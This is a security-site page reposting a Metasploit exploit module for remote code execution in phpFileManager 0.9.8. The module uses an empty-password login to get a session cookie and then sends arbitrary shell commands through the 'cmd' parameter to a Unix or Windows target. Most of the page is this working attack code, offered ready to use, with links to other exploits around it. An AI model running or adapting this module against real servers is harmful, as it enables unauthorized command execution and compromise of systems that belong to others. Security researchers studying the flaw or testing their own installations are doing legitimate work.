首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 phpFileManager 0.9.8 Remote Code Execution 来源：metasploit.com 作者：Turla 发布时间：2015-12-09   ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core'   class Metasploit3 < Msf::Exploit::Remote   Rank = ExcellentRanking     include Msf::Exploit::Remote::HttpClient     def initialize(info={})     super(update_info(info,       'Name'           => 'phpFileManager 0.9.8 Remote Code Execution',       'Description'    => %q{          This module exploits a remote code execution vulnerability in phpFileManager          0.9.8 which is a filesystem management tool on a single file.       },       'License'        => MSF_LICENSE,       'Author'         =>         [           'hyp3rlinx', # initial discovery           'Jay Turla' # msf         ],       'References'     =>         [           [ 'EDB', '37709' ],           [ 'URL', 'http://phpfm.sourceforge.net/' ] # Official Website         ],       'Privileged'     => false,       'Payload'        =>         {           'Space'    => 2000,           'DisableNops' => true,           'Compat'      =>             {               'PayloadType' => 'cmd'             }         },       'Platform'       => %w{ unix win },       'Arch'           => ARCH_CMD,       'Targets'        =>         [           ['phpFileManager / Unix', { 'Platform' => 'unix' } ],           ['phpFileManager / Windows', { 'Platform' => 'win' } ]         ],       'DisclosureDate' => 'Aug 28 2015',       'DefaultTarget'  => 0))       register_options(       [         OptString.new('TARGETURI', [true, 'The path of phpFileManager', '/phpFileManager-0.9.8/index.php']),       ],self.class)   end     def check     txt = Rex::Text.rand_text_alpha(8)     res = http_send_command("echo #{txt}")       if res && res.body =~ /#{txt}/       return Exploit::CheckCode::Vulnerable     else       return Exploit::CheckCode::Safe     end   end     def push     uri = normalize_uri(target_uri.path)       # To push the Enter button     res = send_request_cgi({       'method' => 'POST',       'uri' => uri,       'vars_post' => {         'frame' => '3',         'pass'  => '' # yep this should be empty        }     })       if res.nil?       vprint_error("#{peer} - Connection timed out")       fail_with(Failure::Unknown, "Failed to trigger the Enter button")     end       if res && res.headers && res.code == 302       print_good("#{peer} - Logged in to the file manager")       cookie = res.get_cookies       cookie     else       fail_with(Failure::Unknown, "#{peer} - Error entering the file manager")     end   end     def http_send_command(cmd)     cookie = push     res = send_request_cgi({       'method'   => 'GET',       'uri'      => normalize_uri(target_uri.path),       'cookie'   => cookie,       'vars_get' => {         'action' => '6',         'cmd' => cmd       }     })     unless res && res.code == 200       fail_with(Failure::Unknown, "Failed to execute the command.")     end     res   end     def exploit     http_send_command(payload.encoded)   end end   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Mac OS X 10.11 FTS Buffer Over ·Microsoft Windows Media Center ·OpenMRS 2.3 (1.11.4) XXE Injec ·Microsoft Windows Media Center ·Atlassian HipChat for Jira Plu ·IE 11.0.9600.18097 COmWindowPr ·Oracle BeeHive 2 Code Executio ·Geeklog 2.1.0 Command Injectio ·Oracle BeeHive 2 Arbitrary Fil ·Pe 2.4.3 Buffer Overflow ·Acunetix WVS 10 - Local Privil ·Xdh / LinuxNet Perlbot / fBot   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved